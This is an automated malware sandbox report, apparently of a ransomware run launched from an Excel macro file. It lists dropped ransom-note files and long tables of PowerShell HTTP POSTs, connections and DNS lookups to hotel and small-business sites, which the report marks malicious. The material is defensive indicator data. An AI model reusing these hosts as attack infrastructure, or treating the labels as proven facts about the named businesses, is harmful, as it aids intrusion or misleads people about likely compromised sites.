MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\.oracle_jre_usage\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp.ctbxezehc
binary
MD5: 5a42dade7d99d2815d8147278b212877
SHA256: 4edae37d78e22a8dca7ec1d2e83baa0f3efbda0c1b0d48c517ef7d1880b6e9ba
3596
powershell.exe
C:\Users\admin\AppData\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
2972
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DFAFA7DC591278B768.TMP
––
MD5:  ––
SHA256:  ––
2972
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~$SOC test.xlsm
––
MD5:  ––
SHA256:  ––
2972
EXCEL.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74A5884.png
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 2bcad5da21cb41b727abde7d6b6990b8
SHA256: ab1397e3a31059329829ae2164787589945b1459ed2e1b7328e86ed497a6f9f3
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF217936.TMP
binary
MD5: 2bcad5da21cb41b727abde7d6b6990b8
SHA256: ab1397e3a31059329829ae2164787589945b1459ed2e1b7328e86ed497a6f9f3
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GNG9J65Z8PAWSWTU9UT7.temp
––
MD5:  ––
SHA256:  ––
3328
WScript.exe
C:\Users\admin\AppData\Roaming\tnqalxuybs.log
text
MD5: f82fa95af7c7711b7eb03038a3d7b92f
SHA256: e8a87bb31665aadbedaae5c3a0b3db6346abfef5de8ed8c9e9a04f708d398e61
2972
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVRE9E7.tmp.cvr
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
138
TCP/UDP connections
265
DNS requests
111
Threats
74

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
3596 powershell.exe GET –– 78.46.77.98:80 http://www.2mmotorsport.biz/ DE
––
––
malicious
3596 powershell.exe GET 200 217.26.53.161:80 http://www.haargenau.biz/ CH
html
malicious
3596 powershell.exe POST –– 217.26.53.161:80 http://www.haargenau.biz/content/assets/sehemeka.png CH
text
––
––
malicious
3596 powershell.exe GET 200 74.220.215.73:80 http://www.bizziniinfissi.com/ US
html
malicious
3596 powershell.exe POST 404 74.220.215.73:80 http://www.bizziniinfissi.com/data/assets/dezu.gif US
text
html
malicious
3596 powershell.exe GET 200 136.243.13.215:80 http://www.holzbock.biz/ DE
html
malicious
3596 powershell.exe POST 510 136.243.13.215:80 http://www.holzbock.biz/news/image/deruka.bmp DE
text
html
malicious
3596 powershell.exe GET 301 138.201.162.99:80 http://www.fliptray.biz/ DE
html
malicious
3596 powershell.exe GET 302 192.185.159.253:80 http://www.pizcam.com/ US
––
––
malicious
3596 powershell.exe GET 301 83.138.82.107:80 http://www.swisswellness.com/ DE
––
––
malicious
3596 powershell.exe GET –– 212.59.186.61:80 http://www.hotelweisshorn.com/ CH
––
––
malicious
3596 powershell.exe POST 404 212.59.186.61:80 http://www.hotelweisshorn.com/data/pics/thhedaka.gif CH
text
html
malicious
3596 powershell.exe GET 301 83.166.138.7:80 http://www.whitepod.com/ CH
––
––
malicious
3596 powershell.exe GET –– 69.16.175.10:80 http://www.hardrockhoteldavos.com/ US
––
––
malicious
3596 powershell.exe GET 301 104.24.23.22:80 http://www.belvedere-locarno.com/ US
––
––
malicious
3596 powershell.exe GET 301 80.244.187.247:80 http://www.hotelfarinet.com/ GB
––
––
malicious
3596 powershell.exe GET –– 217.26.53.37:80 http://www.hrk-ramoz.com/ CH
––
––
malicious
3596 powershell.exe POST 404 217.26.53.37:80 http://www.hrk-ramoz.com/includes/imgs/ammekaheke.jpg CH
text
xml
malicious
3596 powershell.exe GET 301 212.59.186.61:80 http://www.morcote-residenza.com/ CH
––
––
malicious
3596 powershell.exe GET 301 136.243.162.140:80 http://www.seitensprungzimmer24.com/ DE
html
malicious
3596 powershell.exe GET 200 93.184.221.240:80 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab US
compressed
whitelisted
3596 powershell.exe GET 200 93.184.221.240:80 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D1CC8D4F82A4.crt US
der
whitelisted
3596 powershell.exe GET 302 213.186.33.5:80 http://www.arbezie-hotel.com/ FR
html
malicious
3596 powershell.exe GET 404 213.186.33.50:80 http://www.arbezie.com/data/assets/semodeimde.jpg FR
html
suspicious
3596 powershell.exe GET –– 217.26.55.5:80 http://www.aubergemontblanc.com/ CH
––
––
malicious
3596 powershell.exe POST –– 217.26.55.5:80 http://www.aubergemontblanc.com/content/image/dezues.jpg CH
text
––
––
malicious
3596 powershell.exe GET 200 93.88.241.198:80 http://www.torhotel.com/ CH
html
malicious
3596 powershell.exe POST 404 93.88.241.198:80 http://www.torhotel.com/content/assets/moimkememose.jpg CH
text
html
malicious
3596 powershell.exe GET 301 83.137.114.198:80 http://www.alpenlodge.com/ AT
––
––
malicious
3596 powershell.exe GET 301 79.170.40.230:80 http://www.aparthotelzurich.com/ GB
html
malicious
3596 powershell.exe GET 301 199.34.228.70:80 http://www.bnbdelacolline.com/ US
html
malicious
3596 powershell.exe GET 301 80.74.144.93:80 http://www.elite-hotel.com/ CH
html
malicious
3596 powershell.exe GET 302 213.186.33.17:80 http://www.bristol-adelboden.com/ FR
html
malicious
3596 powershell.exe GET 301 94.126.23.52:80 http://www.nationalzermatt.com/ CH
html
malicious
3596 powershell.exe GET –– 54.76.92.240:80 http://www.waageglarus.com/ IE
––
––
malicious
3596 powershell.exe POST 403 54.76.92.240:80 http://www.waageglarus.com/data/assets/rukaka.jpg IE
text
html
malicious
3596 powershell.exe GET 301 217.26.52.10:80 http://www.limmathof.com/ CH
––
––
malicious
3596 powershell.exe GET 301 217.26.60.27:80 http://www.apartmenthaus.com/ CH
html
malicious
3596 powershell.exe GET 301 80.74.145.65:80 http://www.berginsel.com/ CH
––
––
malicious
3596 powershell.exe GET 301 52.210.177.133:80 http://www.chambre-d-hote-chez-fleury.com/ IE
––
––
malicious
3596 powershell.exe GET 301 52.210.177.133:80 http://www.hotel-blumental.com/ IE
––
––
malicious
3596 powershell.exe GET 302 157.240.1.35:80 http://www.facebook.com/ US
––
––
whitelisted
3596 powershell.exe GET 301 173.212.202.129:80 http://www.la-fontaine.com/ DE
html
malicious
3596 powershell.exe GET 301 63.33.82.40:80 http://www.mountainhostel.com/ US
––
––
malicious
3596 powershell.exe GET 301 185.199.110.153:80 http://www.hotelalbanareal.com/ NL
html
malicious
3596 powershell.exe GET 301 185.81.1.20:80 http://www.luganohoteladmiral.com/ IT
––
––
malicious
3596 powershell.exe GET 301 104.31.72.20:80 http://www.bellevuewiesen.com/ US
html
malicious
3596 powershell.exe GET 200 213.186.33.4:80 http://www.hoteltruite.com/ FR
html
malicious
3596 powershell.exe POST 404 213.186.33.4:80 http://www.hoteltruite.com/content/assets/rudase.png FR
text
html
malicious
3596 powershell.exe GET –– 185.51.191.29:80 http://www.hotelgarni-battello.com/ HU
––
––
malicious
3596 powershell.exe POST –– 185.51.191.29:80 http://www.hotelgarni-battello.com/static/pictures/fuam.png HU
text
––
––
malicious
3596 powershell.exe GET 301 149.126.4.15:80 http://www.seminarhotel.com/ CH
html
malicious
3596 powershell.exe GET 302 80.74.149.162:80 http://www.kroneregensberg.com/ CH
––
––
malicious
3596 powershell.exe GET 302 80.74.149.162:80 http://kroneregensberg.com/ CH
––
––
malicious
3596 powershell.exe GET –– 80.74.149.162:80 http://kroneregensberg.com/de/ CH
––
––
malicious
3596 powershell.exe GET 301 217.26.54.189:80 http://www.puurehuus.com/ CH
html
malicious
3596 powershell.exe GET 301 52.17.9.185:80 http://www.hotel-zermatt.com/ IE
––
––
malicious
3596 powershell.exe GET –– 185.62.170.1:80 http://www.stchristophesa.com/ CH
––
––
malicious
3596 powershell.exe POST –– 185.62.170.1:80 http://www.stchristophesa.com/content/assets/amrudazuse.png CH
text
––
––
malicious
3596 powershell.exe GET 301 104.108.61.140:80 http://www.nh-hotels.com/ NL
––
––
whitelisted
3596 powershell.exe GET –– 80.74.155.10:80 http://www.schwendelberg.com/ CH
––
––
malicious
3596 powershell.exe POST 406 80.74.155.10:80 http://www.schwendelberg.com/data/graphic/seheru.png CH
text
html
malicious
3596 powershell.exe GET 301 194.246.118.10:80 http://www.stalden.com/ CH
html
malicious
3596 powershell.exe GET 301 194.246.118.10:80 http://www.stalden.com/index.cfm CH
html
malicious
3596 powershell.exe GET –– 213.129.84.57:80 http://www.vignobledore.com/ GB
––
––
malicious
3596 powershell.exe POST 404 213.129.84.57:80 http://www.vignobledore.com/uploads/assets/keimka.bmp GB
text
html
malicious
3596 powershell.exe GET 301 217.26.61.109:80 http://www.eyholz.com/ CH
html
malicious
3596 powershell.exe GET 301 188.227.206.226:80 http://www.flemings-hotel.com/ NL
html
malicious
3596 powershell.exe GET 302 81.23.73.70:80 http://www.hiexgeneva.com/ CH
––
––
malicious
3596 powershell.exe GET 301 195.141.45.95:80 http://www.petit-paradis.com/ CH
––
––
malicious
3596 powershell.exe GET –– 185.92.220.44:80 http://www.berghaus-toni.com/ NL
––
––
malicious
3596 powershell.exe POST –– 185.92.220.44:80 http://www.berghaus-toni.com/content/tmp/thkath.png NL
text
––
––
malicious
3596 powershell.exe GET –– 193.246.38.196:80 http://www.hotelglanis.com/ CH
––
––
malicious
3596 powershell.exe POST 404 193.246.38.196:80 http://www.hotelglanis.com/news/tmp/methsomo.gif CH
text
html
malicious
3596 powershell.exe GET 301 213.186.33.16:80 http://www.16eme.com/ FR
––
––
malicious
3596 powershell.exe GET 302 81.169.242.208:80 http://www.staubbach.com/ DE
html
malicious
3596 powershell.exe GET 301 89.107.184.10:80 http://www.samnaunerhof.com/ DE
html
malicious
3596 powershell.exe GET 301 217.26.54.21:80 http://www.airporthotelbasel.com/ CH
html
malicious
3596 powershell.exe GET 301 94.126.23.52:80 http://www.elite-biel.com/ CH
––
––
malicious
3596 powershell.exe GET 301 188.165.51.93:80 http://www.aubergecouronne.com/ FR
––
––
malicious
3596 powershell.exe GET –– 80.74.153.84:80 http://www.le-saint-hubert.com/ CH
––
––
malicious
3596 powershell.exe POST –– 80.74.153.84:80 http://www.le-saint-hubert.com/content/pics/dafu.jpg CH
text
––
––
malicious
3596 powershell.exe GET –– 193.246.63.157:80 http://www.bonmont.com/ CH
––
––
malicious
3596 powershell.exe POST –– 193.246.63.157:80 http://www.bonmont.com/wp-content/image/essese.bmp CH
text
––
––
malicious
3596 powershell.exe GET 301 149.126.4.89:80 http://www.cm-lodge.com/ CH
––
––
malicious
3596 powershell.exe GET 301 52.30.48.40:80 http://www.experimentalchalet.com/ IE
html
malicious
3596 powershell.exe GET 301 83.166.138.8:80 http://www.guardagolf.com/ CH
––
––
malicious
3596 powershell.exe GET 301 83.166.138.8:80 http://guardagolf.com/ CH
––
––
malicious
3596 powershell.exe GET –– 5.144.168.210:80 http://www.hotelchery.com/ IT
––
––
malicious
3596 powershell.exe POST 400 5.144.168.210:80 http://www.hotelchery.com/uploads/images/deso.png IT
text
html
malicious
3596 powershell.exe GET 301 194.51.187.23:80 http://www.ibis.com/ FR
html
malicious
3596 powershell.exe GET 301 194.51.187.22:80 http://www.mercure.com/ FR
html
malicious
3596 powershell.exe GET 301 195.201.207.213:80 http://www.hotelolden.com/ RU
html
malicious
3596 powershell.exe GET 302 157.240.1.35:80 http://www.facebook.com/ US
––
––
whitelisted
3596 powershell.exe GET 301 46.32.228.22:80 http://www.huusgstaad.com/ GB
html
malicious
3596 powershell.exe GET 200 93.184.221.240:80 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E.crt US
der
whitelisted
3596 powershell.exe GET 302 188.165.40.130:80 http://www.hotelrotonde.com/ FR
––
––
malicious
3596 powershell.exe GET 301 185.58.214.100:80 http://www.relais-crosets.com/ DK
––
––
malicious
3596 powershell.exe GET 301 83.166.148.69:80 http://www.lerichemond.com/ CH
html
malicious
3596 powershell.exe GET 301 104.24.23.22:80 http://www.hotellido-lugano.com/ US
––
––
malicious
3596 powershell.exe GET 301 107.154.114.25:80 http://www.alimentarium.org/ US
html
malicious
3596 powershell.exe GET 301 80.74.149.78:80 http://www.vitatertia.org/ CH
html
malicious
3596 powershell.exe GET 302 149.126.4.66:80 http://www.lassalle-haus.org/ CH
html
malicious
3596 powershell.exe GET 301 52.210.177.133:80 http://www.dermann.org/ IE
––
––
malicious
3596 powershell.exe GET 301 178.209.55.26:80 http://www.neuhof.org/ CH
html
malicious
3596 powershell.exe GET 301 54.76.92.240:80 http://www.osteriadelcentro.net/ IE
––
––
malicious
3596 powershell.exe GET 200 83.166.138.107:80 http://www.cantinesurcoux.net/ CH
html
malicious
3596 powershell.exe POST 404 83.166.138.107:80 http://www.cantinesurcoux.net/static/assets/kaamse.gif CH
text
html
malicious
3596 powershell.exe GET 200 145.239.37.26:80 http://www.lacommune.net/ FR
html
malicious
3596 powershell.exe POST 404 145.239.37.26:80 http://www.lacommune.net/uploads/pictures/sefu.gif FR
text
html
malicious
3596 powershell.exe GET –– 80.74.138.109:80 http://www.hoteldreirosen.net/ CH
––
––
malicious
3596 powershell.exe GET –– 80.74.138.109:80 http://www.hoteldreirosen.net/ CH
text
––
––
malicious
3596 powershell.exe POST 404 80.74.138.109:80 http://www.hoteldreirosen.net/static/images/zuimim.png CH
text
html
malicious
3596 powershell.exe POST 404 80.74.138.109:80 http://www.hoteldreirosen.net/news/tmp/imfueszu.bmp CH
text
html
malicious
3596 powershell.exe GET –– 80.74.138.109:80 http://www.hoteldreirosen.net/ CH
text
––
––
malicious
3596 powershell.exe POST 404 80.74.138.109:80 http://www.hoteldreirosen.net/news/pics/hemoam.jpg CH
text
html
malicious
3596 powershell.exe GET 301 62.2.99.251:80 http://www.disch.mehrmarken.net/ CH
html
malicious
3596 powershell.exe GET 301 62.2.99.251:80 http://disch.mehrmarken.net/neuwagen/ds CH
html
malicious
3596 powershell.exe GET –– 88.198.6.106:80 http://www.gemperle.net/ DE
––
––
malicious
3596 powershell.exe POST 510 88.198.6.106:80 http://www.gemperle.net/data/tmp/kekasome.png DE
text
html
malicious
3596 powershell.exe GET 301 62.2.99.251:80 http://www.garage-schwyn.mehrmarken.net/ CH
html
malicious
3596 powershell.exe GET 301 62.2.99.251:80 http://garage-schwyn.mehrmarken.net/neuwagen/volkswagen/up CH
html
malicious
3596 powershell.exe GET 301 62.2.99.251:80 http://www.ueberland-garage.mehrmarken.net/ CH
html
malicious
3596 powershell.exe GET 301 62.2.99.251:80 http://ueberland-garage.mehrmarken.net/neuwagen/ds CH
html
malicious
3596 powershell.exe GET 301 193.246.38.196:80 http://www.calisto.net/ CH
html
malicious
3596 powershell.exe GET 301 34.249.192.103:80 http://www.r-coiffure.net/ IE
––
––
malicious
3596 powershell.exe GET 301 54.77.172.234:80 http://www.kreatifs.net/ IE
––
––
malicious
3596 powershell.exe GET 200 80.74.155.80:80 http://www.nett-coiffure.ch/ CH
html
malicious
3596 powershell.exe POST 404 80.74.155.80:80 http://www.nett-coiffure.ch/content/pictures/esseth.bmp CH
text
html
malicious
3596 powershell.exe GET –– 94.247.24.38:80 http://www.salon-coiffure-geneve.net/ FR
––
––
malicious
3596 powershell.exe POST –– 94.247.24.38:80 http://www.salon-coiffure-geneve.net/includes/imgs/rudadath.jpg FR
text
––
––
malicious
3596 powershell.exe GET 200 149.126.4.83:80 http://www.farbecht.net/ CH
html
malicious
3596 powershell.exe POST 404 149.126.4.83:80 http://www.farbecht.net/news/imgs/dasoam.png CH
text
html
malicious
3596 powershell.exe GET 200 80.74.142.130:80 http://www.haaratelier.net/ CH
html
malicious
3596 powershell.exe POST 404 80.74.142.130:80 http://www.haaratelier.net/content/imgs/sesome.gif CH
text
html
malicious
3596 powershell.exe GET –– 52.2.192.9:80 http://www.von-arx.net/ US
––
––
malicious
3596 powershell.exe POST 404 52.2.192.9:80 http://www.von-arx.net/uploads/image/ruthzusezuam.jpg US
text
html
malicious
3596 powershell.exe GET 301 149.202.81.123:80 http://www.celi-vegas-avocats.net/ FR
html
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
–– –– 199.91.152.91:443 MediaFire, LLC US unknown
3596 powershell.exe 78.46.77.98:80 Hetzner Online GmbH DE suspicious
3596 powershell.exe 78.46.77.98:443 Hetzner Online GmbH DE suspicious
3596 powershell.exe 217.26.53.161:80 Hostpoint AG CH malicious
3596 powershell.exe 74.220.215.73:80 Unified Layer US malicious
3596 powershell.exe 136.243.13.215:80 Hetzner Online GmbH DE suspicious
3596 powershell.exe 138.201.162.99:80 Hetzner Online GmbH DE malicious
3596 powershell.exe 138.201.162.99:443 Hetzner Online GmbH DE malicious
3596 powershell.exe 192.185.159.253:80 CyrusOne LLC US malicious
3596 powershell.exe 192.185.159.253:443 CyrusOne LLC US malicious
3596 powershell.exe 83.138.82.107:80 hostNET Medien GmbH DE suspicious
3596 powershell.exe 83.138.82.107:443 hostNET Medien GmbH DE suspicious
3596 powershell.exe 212.59.186.61:80 green.ch AG CH malicious
3596 powershell.exe 83.166.138.7:80 Infomaniak Network SA CH malicious
3596 powershell.exe 83.166.138.7:443 Infomaniak Network SA CH malicious
3596 powershell.exe 69.16.175.10:80 Highwinds Network Group, Inc. US suspicious
3596 powershell.exe 69.16.175.10:443 Highwinds Network Group, Inc. US suspicious
3596 powershell.exe 104.24.23.22:80 Cloudflare Inc US malicious
3596 powershell.exe 104.24.23.22:443 Cloudflare Inc US malicious
3596 powershell.exe 80.244.187.247:80 UKfastnet Ltd GB suspicious
3596 powershell.exe 80.244.187.247:443 UKfastnet Ltd GB suspicious
3596 powershell.exe 217.26.53.37:80 Hostpoint AG CH suspicious
3596 powershell.exe 212.59.186.61:443 green.ch AG CH malicious
3596 powershell.exe 136.243.162.140:80 Hetzner Online GmbH DE suspicious
3596 powershell.exe 136.243.162.140:443 Hetzner Online GmbH DE suspicious
3596 powershell.exe 93.184.221.240:80 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
3596 powershell.exe 213.186.33.5:80 OVH SAS FR malicious
3596 powershell.exe 213.186.33.5:443 OVH SAS FR malicious
3596 powershell.exe 213.186.33.50:80 OVH SAS FR suspicious
3596 powershell.exe 217.26.55.5:80 Hostpoint AG CH suspicious
3596 powershell.exe 93.88.241.198:80 Infomaniak Network SA CH malicious
3596 powershell.exe 83.137.114.198:80 Nessus GmbH AT malicious
3596 powershell.exe 83.137.114.198:443 Nessus GmbH AT malicious
3596 powershell.exe 79.170.40.230:80 Host Europe GmbH GB suspicious
3596 powershell.exe 79.170.40.230:443 Host Europe GmbH GB suspicious
3596 powershell.exe 199.34.228.70:80 Weebly, Inc. US malicious
3596 powershell.exe 199.34.228.70:443 Weebly, Inc. US malicious
3596 powershell.exe 80.74.144.93:80 METANET AG CH malicious
3596 powershell.exe 80.74.144.93:443 METANET AG CH malicious
3596 powershell.exe 213.186.33.17:80 OVH SAS FR malicious
3596 powershell.exe 213.186.33.17:443 OVH SAS FR malicious
3596 powershell.exe 94.126.23.52:80 METANET AG CH suspicious
3596 powershell.exe 94.126.23.52:443 METANET AG CH suspicious
3596 powershell.exe 54.76.92.240:80 Amazon.com, Inc. IE malicious
3596 powershell.exe 217.26.52.10:80 Hostpoint AG CH suspicious
3596 powershell.exe 217.26.52.10:443 Hostpoint AG CH suspicious
3596 powershell.exe 217.26.60.27:80 Hostpoint AG CH suspicious
3596 powershell.exe 217.26.60.27:443 Hostpoint AG CH suspicious
3596 powershell.exe 80.74.145.65:80 METANET AG CH malicious
3596 powershell.exe 80.74.145.65:443 METANET AG CH malicious
3596 powershell.exe 52.210.177.133:80 Amazon.com, Inc. IE malicious
3596 powershell.exe 52.210.177.133:443 Amazon.com, Inc. IE malicious
3596 powershell.exe 157.240.1.35:80 Facebook, Inc. US whitelisted
3596 powershell.exe 157.240.1.35:443 Facebook, Inc. US whitelisted
3596 powershell.exe 173.212.202.129:80 Contabo GmbH DE suspicious
3596 powershell.exe 173.212.202.129:443 Contabo GmbH DE suspicious
3596 powershell.exe 63.33.82.40:80 MCI Communications Services, Inc. d/b/a Verizon Business US suspicious
3596 powershell.exe 63.33.82.40:443 MCI Communications Services, Inc. d/b/a Verizon Business US suspicious
3596 powershell.exe 185.199.110.153:80 GitHub, Inc. NL shared
3596 powershell.exe 185.199.110.153:443 GitHub, Inc. NL shared
3596 powershell.exe 185.81.1.20:80 Server Plan S.r.l. IT suspicious
3596 powershell.exe 185.81.1.20:443 Server Plan S.r.l. IT suspicious
3596 powershell.exe 104.31.72.20:80 Cloudflare Inc US shared
3596 powershell.exe 104.31.72.20:443 Cloudflare Inc US shared
3596 powershell.exe 104.31.73.20:443 Cloudflare Inc US malicious
3596 powershell.exe 213.186.33.4:80 OVH SAS FR suspicious
3596 powershell.exe 185.51.191.29:80 ACE Telecom Kft HU suspicious
3596 powershell.exe 149.126.4.15:80 cyon GmbH CH malicious
3596 powershell.exe 149.126.4.15:443 cyon GmbH CH malicious
3596 powershell.exe 80.74.149.162:80 METANET AG CH suspicious
3596 powershell.exe 80.74.149.162:443 METANET AG CH suspicious
3596 powershell.exe 217.26.54.189:80 Hostpoint AG CH suspicious
3596 powershell.exe 217.26.54.189:443 Hostpoint AG CH suspicious
3596 powershell.exe 52.17.9.185:80 Amazon.com, Inc. IE malicious
3596 powershell.exe 52.17.9.185:443 Amazon.com, Inc. IE malicious
3596 powershell.exe 185.62.170.1:80 KRIOS Suisse SA CH malicious
3596 powershell.exe 104.108.61.140:80 Akamai Technologies, Inc. NL whitelisted
3596 powershell.exe 104.108.61.140:443 Akamai Technologies, Inc. NL whitelisted
3596 powershell.exe 80.74.155.10:80 METANET AG CH suspicious
3596 powershell.exe 194.246.118.10:80 Iway AG CH suspicious
3596 powershell.exe 194.246.118.10:443 Iway AG CH suspicious
3596 powershell.exe 213.129.84.57:80 The Bunker Secure Hosting Ltd GB suspicious
3596 powershell.exe 217.26.61.109:80 Hostpoint AG CH malicious
3596 powershell.exe 217.26.61.109:443 Hostpoint AG CH malicious
3596 powershell.exe 188.227.206.226:80 Source XS B.V. NL suspicious
3596 powershell.exe 188.227.206.226:443 Source XS B.V. NL suspicious
3596 powershell.exe 81.23.73.70:80 VTX Services SA CH suspicious
3596 powershell.exe 81.23.73.70:443 VTX Services SA CH suspicious
3596 powershell.exe 195.141.45.95:80 Sunrise Communications AG CH malicious
3596 powershell.exe 195.141.45.95:443 Sunrise Communications AG CH malicious
3596 powershell.exe 185.92.220.44:80 Choopa, LLC NL suspicious
3596 powershell.exe 193.246.38.196:80 Bluewin CH suspicious
3596 powershell.exe 213.186.33.16:80 OVH SAS FR malicious
3596 powershell.exe 213.186.33.16:443 OVH SAS FR malicious
3596 powershell.exe 81.169.242.208:80 Strato AG DE malicious
3596 powershell.exe 81.169.242.208:443 Strato AG DE malicious
3596 powershell.exe 89.107.184.10:80 TelemaxX Telekommunikation GmbH DE malicious
3596 powershell.exe 89.107.184.10:443 TelemaxX Telekommunikation GmbH DE malicious
3596 powershell.exe 217.26.54.21:80 Hostpoint AG CH malicious
3596 powershell.exe 217.26.54.21:443 Hostpoint AG CH malicious
3596 powershell.exe 188.165.51.93:80 OVH SAS FR suspicious
3596 powershell.exe 188.165.51.93:443 OVH SAS FR suspicious
3596 powershell.exe 80.74.153.84:80 METANET AG CH malicious
3596 powershell.exe 193.246.63.157:80 Swisscom (Switzerland) Ltd CH suspicious
3596 powershell.exe 149.126.4.89:80 cyon GmbH CH malicious
3596 powershell.exe 149.126.4.89:443 cyon GmbH CH malicious
3596 powershell.exe 52.30.48.40:80 Amazon.com, Inc. IE unknown
3596 powershell.exe 52.30.48.40:443 Amazon.com, Inc. IE unknown
3596 powershell.exe 83.166.138.8:80 Infomaniak Network SA CH suspicious
3596 powershell.exe 83.166.138.8:443 Infomaniak Network SA CH suspicious
3596 powershell.exe 5.144.168.210:80 SEEWEB s.r.l. IT malicious
3596 powershell.exe 194.51.187.23:80 Thales Services SAS FR malicious
3596 powershell.exe 194.51.187.23:443 Thales Services SAS FR malicious
3596 powershell.exe 194.51.187.22:80 Thales Services SAS FR malicious
3596 powershell.exe 194.51.187.22:443 Thales Services SAS FR malicious
3596 powershell.exe 195.201.207.213:80 Awanti Ltd. RU malicious
3596 powershell.exe 195.201.207.213:443 Awanti Ltd. RU malicious
3596 powershell.exe 46.32.228.22:80 Host Europe GmbH GB malicious
3596 powershell.exe 46.32.228.22:443 Host Europe GmbH GB malicious
3596 powershell.exe 188.165.40.130:80 OVH SAS FR suspicious
3596 powershell.exe 188.165.40.130:443 OVH SAS FR suspicious
3596 powershell.exe 185.58.214.100:80 mono solutions ApS DK malicious
3596 powershell.exe 185.58.214.100:443 mono solutions ApS DK malicious
3596 powershell.exe 83.166.148.69:80 Infomaniak Network SA CH malicious
3596 powershell.exe 83.166.148.69:443 Infomaniak Network SA CH malicious
3596 powershell.exe 107.154.114.25:80 Incapsula Inc US malicious
3596 powershell.exe 107.154.114.25:443 Incapsula Inc US malicious
3596 powershell.exe 80.74.149.78:80 METANET AG CH malicious
3596 powershell.exe 80.74.149.78:443 METANET AG CH malicious
3596 powershell.exe 149.126.4.66:80 cyon GmbH CH malicious
3596 powershell.exe 149.126.4.66:443 cyon GmbH CH malicious
3596 powershell.exe 178.209.55.26:80 Nine Internet Solutions AG CH suspicious
3596 powershell.exe 178.209.55.26:443 Nine Internet Solutions AG CH suspicious
3596 powershell.exe 54.76.92.240:443 Amazon.com, Inc. IE malicious
3596 powershell.exe 83.166.138.107:80 Infomaniak Network SA CH suspicious
3596 powershell.exe 145.239.37.26:80 OVH SAS FR suspicious
3596 powershell.exe 80.74.138.109:80 METANET AG CH malicious
3596 powershell.exe 62.2.99.251:80 Liberty Global Operations B.V. CH malicious
3596 powershell.exe 62.2.99.251:443 Liberty Global Operations B.V. CH malicious
3596 powershell.exe 88.198.6.106:80 Hetzner Online GmbH DE malicious
3596 powershell.exe 193.246.38.196:443 Bluewin CH suspicious
3596 powershell.exe 34.249.192.103:80 Amazon.com, Inc. IE suspicious
3596 powershell.exe 34.249.192.103:443 Amazon.com, Inc. IE suspicious
3596 powershell.exe 54.77.172.234:80 Amazon.com, Inc. IE malicious
3596 powershell.exe 54.77.172.234:443 Amazon.com, Inc. IE malicious
3596 powershell.exe 80.74.155.80:80 METANET AG CH suspicious
3596 powershell.exe 94.247.24.38:80 ELB Multimedia SARL FR suspicious
3596 powershell.exe 149.126.4.83:80 cyon GmbH CH suspicious
3596 powershell.exe 80.74.142.130:80 METANET AG CH malicious
3596 powershell.exe 52.2.192.9:80 Amazon.com, Inc. US suspicious
3596 powershell.exe 149.202.81.123:80 OVH SAS FR suspicious
3596 powershell.exe 149.202.81.123:443 OVH SAS FR suspicious

DNS requests

Domain IP Reputation
download1591.mediafire.com 199.91.152.91
unknown
www.2mmotorsport.biz 78.46.77.98
malicious
www.haargenau.biz 217.26.53.161
malicious
www.bizziniinfissi.com 74.220.215.73
malicious
www.holzbock.biz 136.243.13.215
malicious
www.fliptray.biz 138.201.162.99
malicious
www.pizcam.com 192.185.159.253
malicious
www.swisswellness.com 83.138.82.107
malicious
www.hotelweisshorn.com 212.59.186.61
malicious
www.whitepod.com 83.166.138.7
malicious
www.hardrockhoteldavos.com 69.16.175.10
69.16.175.42
malicious
www.belvedere-locarno.com 104.24.23.22
104.24.22.22
malicious
www.hotelfarinet.com 80.244.187.247
malicious
www.hrk-ramoz.com 217.26.53.37
malicious
www.morcote-residenza.com 212.59.186.61
malicious
www.seitensprungzimmer24.com 136.243.162.140
malicious
www.download.windowsupdate.com 93.184.221.240
whitelisted
seitensprungzimmer24.com 136.243.162.140
malicious
www.arbezie-hotel.com 213.186.33.5
malicious
www.arbezie.com 213.186.33.50
suspicious
